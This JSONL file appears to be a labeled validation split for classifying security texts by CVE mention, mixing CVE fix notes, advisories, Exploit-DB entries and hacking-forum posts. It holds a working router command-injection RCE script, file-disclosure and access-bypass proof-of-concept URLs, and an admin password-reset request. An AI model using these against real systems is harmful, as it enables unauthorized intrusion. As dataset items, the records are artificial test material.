+{"id": "e10774a468aafaf13965", "text": "CVE: CVE-2022-29254\n\n[{'lang': 'en', 'value': 'silverstripe-omnipay is a SilverStripe integration with Omnipay PHP payments library. For a subset of Omnipay gateways (those that use intermediary states like `isNotification()` or `isRedirect()`), if the payment identifier or success URL is exposed it is possible for payments to be prematurely marked as completed without payment being taken. This is mitigated by the fact that most payment gateways hide this information from users, however some issuing banks offer flawed 3DSecure implementations that may inadvertently expose this data. The following versions have been patched to fix this issue: `2.5.2`, `3.0.2`, `3.1.4`, and `3.2.1`. There are no known workarounds for this vulnerability.'}]\n\nFix commit: [CVE-2022-29254] Add extra validation on payment completion", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "dbc69674fbf7d304da6c", "text": "CVE: CVE-2022-31052\n\n[{'lang': 'en', 'value': \"Synapse is an open source home server implementation for the Matrix chat network. In versions prior to 1.61.1 URL previews of some web pages can exhaust the available stack space for the Synapse process due to unbounded recursion. This is sometimes recoverable and leads to an error for the request causing the problem, but in other cases the Synapse process may crash altogether. It is possible to exploit this maliciously, either by malicious users on the homeserver, or by remote users sending URLs that a local user's client may automatically request a URL preview for. Remote users are not able to exploit this directly, because the URL preview endpoint is authenticated. Deployments with `url_preview_enabled: false` set in configuration are not affected. Deployments with `url_preview_enabled: true` set in configuration **are** affected. Deployments with no configuration value set for `url_preview_enabled` are not affected, because the default is `false`. Administrators of homeservers with URL previews enabled are advised to upgrade to v1.61.1 or higher. Users unable to upgrade should set `url_preview_enabled` to false.\"}]\n\nFix commit: Merge pull request from GHSA-22p3-qrh9-cx32\n\n* Make _iterate_over_text easier to read by using simple data structures\n\n* Prefer a set of tags to ignore\n\nIn my tests, it's 4x faster to check for containment in a set of this size\n\n* Add a stack size limit to _iterate_over_text\n\n* Continue accepting the case where there is no body element\n\n* Use an early return instead for None\n\nCo-authored-by: Richard van der Hoff ", "source": "cvefixes", "timestamp": "2022-06-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "eba2337a429649737015", "text": "Anonsurf Works for Parrot and Kali and there is also one for Ubuntu 18.04 linuxhint.com Anonsurf Anonsurf is a privacy protection module that uses Tor IPTables for the configuration of IP packet filter rules. While Tor provides a browser solution, Anonsurf is capable of much more.This article will show you how to run Anonsurf’s Anon Mode. GitHub GitHub - Und3rf10w/kali-anonsurf: A port of ParrotSec's stealth and anonsurf... A port of ParrotSec's stealth and anonsurf modules to Kali Linux - GitHub - Und3rf10w/kali-anonsurf: A port of ParrotSec's stealth and anonsurf modules to Kali Linux GitHub GitHub - moonchitta/anonsurf-ubuntu: Parrot OS annonsurf ported to ubuntu Parrot OS annonsurf ported to ubuntu. Contribute to moonchitta/anonsurf-ubuntu development by creating an account on GitHub.", "source": "hackersploit", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8e6d0060b1d6a02bcf9e", "text": "CVE: CVE-2022-1154\n\n[{'lang': 'en', 'value': 'Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646.'}]\n\nFix commit: patch 8.2.4646: using buffer line after it has been freed\n\nProblem: Using buffer line after it has been freed in old regexp engine.\nSolution: After getting mark get the line again.", "source": "cvefixes", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "54d331920c60ec3159bd", "text": "CVE: CVE-2022-27157\n\n[{'lang': 'en', 'value': 'pearweb < 1.32 is suffers from a Weak Password Recovery Mechanism via include/users/passwordmanage.php.'}]\n\nFix commit: Be cautious about what can be unserialized", "source": "cvefixes", "timestamp": "2022-04-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "feaf4c892ad0d63b0f92", "text": "I’m sorry, most likely, the message will not reach the addressee, but isn’t trying to achieve the goal the path to success? I am engaged in multi-level testing of web resources, including Penetration Testing. If you still need it, I’ll be happy to help.", "source": "hackersploit", "timestamp": "2022-05-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "765621a07b994ac8abac", "text": "Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)\n\n# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)\n# Date: 2022-03-11\n# Exploit Author: Aryan Chehreghani\n# Vendor Homepage: http://www.seowonintech.co.kr\n# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30\n# Version: All version\n# Tested on: Windows 10 Enterprise x64 , Linux\n# CVE : CVE-2020-17456\n\n# [ About - Seowon SLR-120 router ]:\n\n#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,\n#The convenience of sharing wireless internet access invigorates your lifestyle, families,\n#friends and workmates. Carry it around to boost your active communication anywhere.\n\n# [ Description ]:\n\n#Execute commands without authentication as admin user ,\n#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.\n\n# [ Vulnerable products ]:\n\n#SLR-120S42G\n#SLR-120D42G\n#SLR-120T42G\n\nimport requests\n\nprint ('''\n###########################################################\n# Seowon SLR-120S42G router - RCE (Unauthenticated) #\n# BY:Aryan Chehreghani #\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\n# mail:aryanchehreghani@yahoo.com #\n# -+-USE:python script.py #\n# Example Target : http://192.168.1.1:443/ #\n###########################################################\n''')\n\nurl = input (\"=> Enter Target : \")\n\nwhile(True):\n\n try:\n\n cmd = input (\"~Enter Command $ \")\n\n header = {\n\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\",\n\"Accept\": \"*/*\",\n\"Accept-Language\": \"en-US,en;q:0.5\",\n\"Accept-Encoding\": \"gzip, deflate\",\n\"Content-Type\": \"application/x-www-form-urlencoded\",\n\"Content-Length\": \"207\",\n\"Origin\": \"http://192.168.1.1\",\n\"Connection\": \"close\",\n\"Referer\": \"http://192.168.1.1/\",\n\"Upgrade-Insecure-Requests\": \"1\"\n}\n\n datas = {\n'Command':'Diagnostic',\n'traceMode':'ping',\n'reportIpOnly':'',\n'pingIpAddr':';'+cmd,\n'pingPktSize':'56',\n'pingTimeout':'30',\n'pingCount':'4',\n'maxTTLCnt':'30',\n'queriesCnt':'3',\n'reportIpOnlyCheckbox':'on',\n'logarea':'com.cgi',\n'btnApply':'Apply',\n'T':'1646950471018'\n}\n\n x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)\n\n print(x.text)\n\n except:\n break", "source": "exploitdb", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "911953e7f26406d161df", "text": "In typical fashion I got this two minutes after I posted. I could have sworn I tried this method a few times already but this seemed work this time. My clues would CUPP Harry usernameGenerator Harry Potter maybe don’t be so sed about this one.", "source": "hackthebox", "timestamp": "2022-01-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "403ca14be3b283770165", "text": "As the Gattsu mentioned above, the problem is PHP code. Try to simplify it, how could you execute ls command within PHP without passing it through parameter?", "source": "hackthebox", "timestamp": "2023-04-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3335fd3dab525d3a68c7", "text": "Can someone give a hint on elasticity? The web api seem to accept some chars, e.g. \\ or quotes, but I don’t seem to be able to do anything with it. Internal ports 9200/9300 not responding. Not sure what to do at this point.", "source": "hackthebox", "timestamp": "2023-07-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c127743ac8a3b0b1fbe2", "text": "hey bro did you solve this problem? Create a “For” loop that encodes the variable “var” 28 times in “base64”. The number of characters in the 28th hash is the value that must be assigned to the “salt” variable. it gives me this error Extra arguments given. enc: Use -help for summary. can u help me please?", "source": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4fe5f32557dc6874e380", "text": "Hi @kekeli If you haven’t already, first learn the IPv4 network stack along with how to subnet. Knowing the basics of Linux is a big step too. (YouTube and Google are your “friends”.) Optional*: Set up a virtual machine program (like VirtualBox, VMware, etc.) with Windows and Linux (Parrot) guests to act as your ethical hacking lab. Ensure the two or so VM guests (and host) can see each other over the bridged virtual network (ping). *If you are running Parrot on bare metal, you would only need a Windows virtual machine guest (at first). If you are running Windows, I recommend a Windows VM as well in which to practice your skills without damaging the host. Play around and get familiar with Nmap and Wireshark . Send packet snips from nmap from one PC and see how Wireshark shows the scan. Concentrate mainly on Wireshark to see the type of traffic which is normal, and then play around with nmap. Once you get good, Metasploit would be the 3rd “hacking” tool to learn. People may say “Join Hack The Box and TryHackMe ”, and you should, eventually. Have “fun”.", "source": "parrotsec", "timestamp": "2023-03-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "19f3c30c7c1d0f225ebb", "text": "Change username in community profile\n\nHow do i change my username in parrotsec community profile?", "source": "parrotsec", "timestamp": "2023-08-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3c1beff6b18ba382824b", "text": "MantisBT cross-site scripting (XSS) vulnerability through crafted PATH_INFO\n\n[Severity: MEDIUM]\n\nA cross-site scripting (XSS) vulnerability in the View Filters page (view_filters_page.php) and Edit Filter page (manage_filter_edit_page.php) in MantisBT 2.1.0 through 2.17.0 allows remote attackers to inject arbitrary code (if CSP settings permit it) through a crafted PATH_INFO. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-13055.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7d7b1634b5b44ab47330", "text": "Learn hacking from scratch\n\nHello guys, i am very much interested in hacking i have searched alot of things but i did nothing i found had a good foundation if anyone could guide me what to follow from scratch your help will be much appreciated. i am sure other new people who are looking for learning hacking from scratch will fill find this helpful aswell. Thank you.", "source": "parrotsec", "timestamp": "2022-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a546477bcc2667b988a9", "text": "CVE: CVE-2021-3640\n\n[{'lang': 'en', 'value': 'A flaw use-after-free in function sco_sock_sendmsg() of the Linux kernel HCI subsystem was found in the way user calls ioct UFFDIO_REGISTER or other way triggers race condition of the call sco_conn_del() together with the call sco_sock_sendmsg() with the expected controllable faulting memory page. A privileged local user could use this flaw to crash the system or escalate their privileges on the system.'}]\n\nFix commit: Bluetooth: sco: Fix lock_sock() blockage by memcpy_from_msg()\n\nThe sco_send_frame() also takes lock_sock() during memcpy_from_msg()\ncall that may be endlessly blocked by a task with userfaultd\ntechnique, and this will result in a hung task watchdog trigger.\n\nJust like the similar fix for hci_sock_sendmsg() in commit\n92c685dc5de0 (\"Bluetooth: reorganize functions...\"), this patch moves\nthe memcpy_from_msg() out of lock_sock() for addressing the hang.\n\nThis should be the last piece for fixing CVE-2021-3640 after a few\nalready queued fixes.\n\nSigned-off-by: Takashi Iwai \nSigned-off-by: Marcel Holtmann ", "source": "cvefixes", "timestamp": "2022-03-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "349ef351956d846762b4", "text": "I really think that there be an issue with those KIA Souls they seemed to be exploited very easily. My wife owns one and there is a rash of these being stolen with someone just getting an USB cable and an app on their phone. I wish there was a way to harden the ones that didn’t get the update from the manufacturer .", "source": "parrotsec", "timestamp": "2023-03-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0096d20ee594843a570f", "text": "It worked! Tell me, please, who is the expert on regular expressions. Who can I personally write to, consult. There are a couple of points that my grep filter has not mastered ( I had to filter out the extra passwords a little manually. Everything worked out, but I want to close this topic completely for myself. Yes, who can tell ьу, for the delay in the attack in BurpSuit, which parameter is responsible. Bypass timing protection. Error Handling?", "source": "hackthebox", "timestamp": "2022-07-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "50be7eeb94a4c63e2c4e", "text": "CVE: CVE-2021-3979\n\n[{'lang': 'en', 'value': 'A key length flaw was found in Red Hat Ceph Storage. An attacker can exploit the fact that the key length is incorrectly passed in an encryption algorithm to create a non random key, which is weaker and can be exploited for loss of confidentiality and integrity on encrypted disks.'}]\n\nFix commit: ceph-volume: honour osd_dmcrypt_key_size option\n\nceph-volume doesn't honour osd_dmcrypt_key_size.\nIt means the default size is always applied.\n\nIt also changes the default value in `get_key_size_from_conf()`\n\nFrom cryptsetup manpage:\n\n> For XTS mode you can optionally set a key size of 512 bits with the -s option.\n\nUsing more than 512bits will end up with the following error message:\n\n```\nKey size in XTS mode must be 256 or 512 bits.\n```\n\nFixes: https://tracker.ceph.com/issues/54006\n\nSigned-off-by: Guillaume Abrioux ", "source": "cvefixes", "timestamp": "2022-08-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "38028c79ceda601e197f", "text": "People, tell me about the overflow . RIP under control, but how can I put the reverse shell into 72 bytes? My shellcode is at least 95 bytes?", "source": "hackthebox", "timestamp": "2023-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0fb6e33b59f969d080b1", "text": "Hi Swindler, I’ve been trying all different ways the past week. Can you share how you were able to dump the contents of the flag in an error msg? I’m clicking on the Move folder, then injecting my command after the “to=” on the GET request. I’m getting different error messages, but it’s only showing exactly what I type in instead of the contents of the flag. Please help!", "source": "hackthebox", "timestamp": "2023-04-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5c5235e2baaa2fd56663", "text": "AES256-CTR Attack for CTF Challenge\n\nHello, I have a CTF challenge at my university and unfortunately I don’t know what to do next. Here are all the clues: I can enter my student ID and get a cipher text back. Flags have the format {f=XXX}, where XXX consists of 12 pseudo-random characters from the alphabet “0123456789abcdef”. Here is the code that calculates the cipher text: import os from Crypto.Cipher import AES def encrypt(msg): nonce = os.urandom(8) key = os.urandom(32) c = b'' for i in range((len(msg)//16)+1): aes = AES.new(key,AES.MODE_CTR, nonce = nonce) c +=aes.encrypt(msg[16*i:16*(i+1)]) return c plaintext = '''GET / HTTP/1.1\\r\\nHost: ctf.itsc.uni-xxx.de\\r\\nUser-Agent: Mozilla\\5.9 (X11; Ubuntu: Linux x86_64; rv:62.0) Gecko/20100101 Firefox/ 62.0\\r\\nAccept: text/html,application/xhtml+xml,application/xml;qU0.9,*/*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Encoding: gzip, deflate, br\\r\\nConnection: keep-alive\\r\\nCookie: {{f={}}}'''.format(flag) ciphertext = encrypt(plaintext.encode()).hex() The encryption code was implemented in Python3 and the PyCryptoDome library. There is another note that you should pay particular attention to how the counter mode was implemented. Example for student ID 1950243 is the cipher text: cb581035f90f6091ba1e9857a25f081bc4723761ec0f4bb18860de12ff0d2b64e2746962a35f58a09c3ad60aa20a601c86483770a40269a28b20c35cac236a6be5712874f91a06f5ce66ef57bd552544ee682a61a31408898720c21eac163d27d32b702ef65d5effd87c9956a54e4274ef762b3ae41f19f5de7f8757ac286c63e97b2b6df9191aebde43bd27ef0d6061f8276461b3575cea863ada0aa00f7561e0742774a24647abc136df12e1022e69e1716874a65f44ac8d2fc30fe3002a69e1717f64eb1f06fcc264984cb71f3821a225491f974c4ba09e3a9a2aed006264ed7a212ff64a46e8bb1d9b03e255742cbc337118dc6e4ba68b3ec34bc900667ee8742a72ec0f4fbf873e9b46e80b637ded692139f64d5ac8e40dd808e20b6665e5722a2ff6444da09e63d60ae518601c865e2b7abd464dffce35d15bbf0c3025e8297624e11b19f393 I tried reversing the calculation but without the key I couldn’t find myself in much progress. I also tried analyzing the cipher texts and while I was able to find similarities, I can’t seem to find anything else. I am not particularly looking for the complete solution, rather some clues as to what I might be missing. I would be happy if anyone could point the way", "source": "hackthebox", "timestamp": "2023-11-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fd21877b3b4d11886cc4", "text": "git-url-parse crate vulnerable to Regular Expression Denial of Service\n\n[Severity: LOW]\n\nThe git-url-parse crate through 0.4.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to `normalize_url` in `lib.rs`, a similar issue to CVE-2023-32758 (Python).", "source": "github_advisory", "timestamp": "2023-06-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "583faae0039dd367b1c5", "text": "OpenBullet 2 V0.2.4\n\nInstall the Microsoft .NET 6 (desktop apps version) from Download .NET 6.0 Download Link : sitehunterus.blogspot.com OpenBullet 2 V0.2.4 Install the Microsoft .NET 6 ( desktop apps version ) from Download .NET 6.0 Download Here VirusTotal Password Unrar is 1 VirusTotal: virustotal.com VirusTotal VirusTotal Password Unrar is 1", "source": "hackersploit", "timestamp": "2022-09-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c6481b4913d249e79496", "text": "CVE: CVE-2022-1722\n\n[{'lang': 'en', 'value': \"SSRF in editor's proxy via IPv6 link-local address in GitHub repository jgraph/drawio prior to 18.0.5. SSRF to internal link-local IPv6 addresses\"}]\n\nFix commit: Adds isLinkLocalAddress() to address checks", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "818b734023d9390365a0", "text": "Thanks for the shout out and I’m glad i contributed in some ways. Lets keep the fight and definitely wish you all the best in Information Security World. Let me know if you need any help going forward.", "source": "hackthebox", "timestamp": "2022-12-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e4efd198f390020ebb96", "text": "Command injection in OpenTSDB\n\n[Severity: CRITICAL]\n\nDue to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation.", "source": "github_advisory", "timestamp": "2023-05-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1ea9fa4be6b3b051e7aa", "text": "Can smb help me with overflown? Every time I got segm fault", "source": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "113fa3768c5b28096b71", "text": "There is a lot of caveats for getting this lab to work. Have to use an IDE in the pwnbox VM on the browser, install .NET, and apparently have to be connected using the EU VPN…", "source": "hackthebox", "timestamp": "2023-09-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "98710f6158ba8b0085c9", "text": "Authorization Header forwarded on redirect\n\n[Severity: MEDIUM]\n\nurllib3 before 1.24.2 does not remove the authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the authorization header to be exposed to unintended hosts or transmitted in cleartext. NOTE: this issue exists because of an incomplete fix for CVE-2018-20060 (which was case-sensitive).", "source": "github_advisory", "timestamp": "2023-10-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f3d1abb08002941efc19", "text": "CVE: CVE-2021-45005\n\n[{'lang': 'en', 'value': 'Artifex MuJS v1.1.3 was discovered to contain a heap buffer overflow which is caused by conflicting JumpList of nested try/finally statements.'}]\n\nFix commit: Bug 704749: Clear jump list after patching jump addresses.\n\nSince we can emit a statement multiple times when compiling try/finally\nwe have to use a new patch list for each instance.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "732cb8f61e923be8256a", "text": "CTF Game vs. real world Pentesting\n\nHey folks, maybe you can help me with a brainbug: Most CTFs are based on Linux. Even THM, Vulnhub, etc. Not uncommon for webapps, but most (or nearly all) companies are running Windows and Active Directory stuff on their nets. I don’t want to raise the blinds even to OT/ICS/SCADA. Can anybody suggest material to learn/practice for “M$/AD Pentester’s Daily Grind”? Thank you Dom", "source": "hackersploit", "timestamp": "2023-06-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e51e83ad6a8fd229acbb", "text": "Adobe Connect 11.4.5 - Local File Disclosure\n\n# Title: Adobe Connect 11.4.5 - Local File Disclosure\n# Author: h4shur\n# date:2021.01.16-2023.02.17\n# CVE: CVE-2023-22232\n# Vendor Homepage: https://www.adobe.com\n# Software Link: https://www.adobe.com/products/adobeconnect.html\n# Version: 11.4.5 and earlier, 12.1.5 and earlier\n# User interaction: None\n# Tested on: Windows 10 & Google Chrome, kali linux & firefox\n\n### Summary:\nAdobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature.\nExploitation of this issue does not require user interaction.\n\n### Description :\nThere are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the \"adobe connect\" program, have vulnerabilities that occur every month. They are found and fixed by the team.\n* What is LFD bug?\nLFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug\n* Intruder access level with LFD bug\nThe level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access\n* Identify vulnerable sites\nTo search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file\n* And this time the \"lfd\" in \"adobe connect\" bug:\nTo download and exploit files, you must type the file path in the \"download-url\" variable and the file name and extension in the \"name\" variable.\nYou can download the file by writing the file path and file name and extension.\nWhen you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with \"Save to My Computer\nfile name]\" written in the download box and a file download link at the bottom of the download box, so you can download the file.\n* There are values inside the url that do not allow a file other than this file to be downloaded.\n* Values: sco_id and tickets\nBut if these values are cleared, you will see that reloading is possible without any obstacles\nAt another address, you can download multiple files as a zip file.\nWe put the address of the files in front of the variable \"ffn\" and if we want to add the file, we add the variable \"ffn\" again and put the address of the file in front of it. The \"download_type\" variable is also used to specify the zip extension.\n\n### POC :\nhttps://target.com/[folder]/download?download-url=[URL]&name=[file.type]\nhttps://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder]\n\n### References:\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232\nhttps://nvd.nist.gov/vuln/detail/CVE-2023-22232\nhttps://helpx.adobe.com/security/products/connect/apsb23-05.html", "source": "exploitdb", "timestamp": "2023-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "706423c024e33007509e", "text": "CVE: CVE-2021-44664\n\n[{'lang': 'en', 'value': \"An Authenticated Remote Code Exection (RCE) vulnerability exists in Xerte through 3.9 in website_code/php/import/fileupload.php by uploading a maliciously crafted PHP file though the project interface disguised as a language file to bypasses the upload filters. Attackers can manipulate the files destination by abusing path traversal in the 'mediapath' variable.\"}]\n\nFix commit: Security! Check and verify paths used by move_uploaded_file\n\n - Make sure uploaded files can only be saved in the USER-FILES\n subfolder", "source": "cvefixes", "timestamp": "2022-02-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9e5edb57ff0d0cb2be5e", "text": "Burp Browser cannot work with a modified /etc/hosts entry\n\nHello, I am having an issue using burp or any proxy for that matter when an IP address requires me to make an entry into the /etc/hosts file. Whenever I modify the /etc/hosts/ file and I try to visit the website, Burp gives me a default Spectrum Router info page. I do not have this issue with my browser on my Kali. I can visit the domain in /etc/hosts but not on Burp Browser and through foxyproxy. I do not have this issue when boxes do not have a domain name and just goes straight to IP address.", "source": "hackthebox", "timestamp": "2023-02-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f83ea5faaed334f360aa", "text": "Auto Dealer Management System 1.0 - Broken Access Control Exploit\n\n# Exploit Title: Auto Dealer Management System 1.0 - Broken Access Control Exploit\n\nIt leads to compromise of all application accounts by accessing the ?page=user/list with low privileged user account\n\n### Date:\n> 18 February 2023\n\n### CVE Assigned: **[CVE-2023-0916](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0916)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0916) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0916)\n\n### Author:\n> Muhammad Navaid Zafar Ansari\n### Vendor Homepage:\n> https://www.sourcecodester.com\n### Software Link:\n> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)\n### Version:\n> v 1.0\n### Broken Authentication:\n> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.\n\n# Tested On: Windows 11\n\n### Affected Page:\n> list.php , manage_user.php\n\n> On these page, application isn't verifying the authorization mechanism. Due to that, all the parameters are vulnerable to broken access control and low privilege user could view the list of user's and change any user password to access it.\n\n### Description:\n> Broken access control allows low privilege attacker to change password of all application users\n\n### Proof of Concept:\n> Following steps are involved:\n1. Visit the vulnerable page: ?page=user/list\n2. Click on Action and Edit the password of Admin\n\n\n\n4. Update the Password and Submit\n\n5. Request:\n```\nPOST /adms/classes/Users.php?f=save HTTP/1.1\nHost: localhost\nContent-Length: 877\nsec-ch-ua: \"Chromium\";v=\"109\", \"Not_A Brand\";v=\"99\"\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfODLB5j55MvB5pGU\nX-Requested-With: XMLHttpRequest\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36\nsec-ch-ua-platform: \"Windows\"\nOrigin: http://localhost\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost/adms/admin/?page=user/manage_user&id=1\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5\nConnection: close\n\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"id\"\n\n1\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"firstname\"\n\nAdminstrator\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"middlename\"\n\n\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"lastname\"\n\nAdmin\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"password\"\n\nadmin123\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"type\"\n\n1\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryfODLB5j55MvB5pGU--\n\n```\n6. Successful exploit screenshots are below (without cookie parameter)\n\n\n7. Vulnerable Code Snippets:\n\n\n\n\n\n### Recommendation:\n> Whoe", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "cacf44032b3acfdee83b", "text": "[Improper Access Control - Generic] Adobe ColdFusion Access Control Bypass - CVE-2023-38205\n\n**Description:**\nHi team,\nThe subdomain https://████ is with adobe ColdFusion vulnerable with CVE-2023-38205.\nThis vulnerability is a bypass path created for CVE-2023-29298.\n\n## References\n\nhttps://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/\n\n## Impact\n\nIf an attacker accesses a URL path of /hax/..CFIDE/wizards/common/utils.cfc the access control can be bypassed and the expected endpoint can still be reached, even though it is not a valid URL path .\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2023-38205\n\n## Steps to Reproduce\n1. Go to: https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\n2. See the remote method call wizardHash on the/CFIDE/wizards/common/utils.cfc endpoint.\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-12-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2da00e12a7600ac22793", "text": "most secure login manager\n\nI know that keepassxc was removed from parrot because it was deemed useless I would like the most secure login managent framework available I have seen that keeper plus yubikey bio creates perhaps the perfect solution, however yubikeys are expensive. Is there an open source inexpensive solution, that utilises local USB storage, FIDO2, phone fingerprint or eye scan as part of the solution?", "source": "parrotsec", "timestamp": "2022-09-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ca219f8c95dafca1c48e", "text": "Repositorio pen test\n\nHello everyone can anybody help me which command do i run to install the pen test tools on parrot xfce home", "source": "parrotsec", "timestamp": "2022-01-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
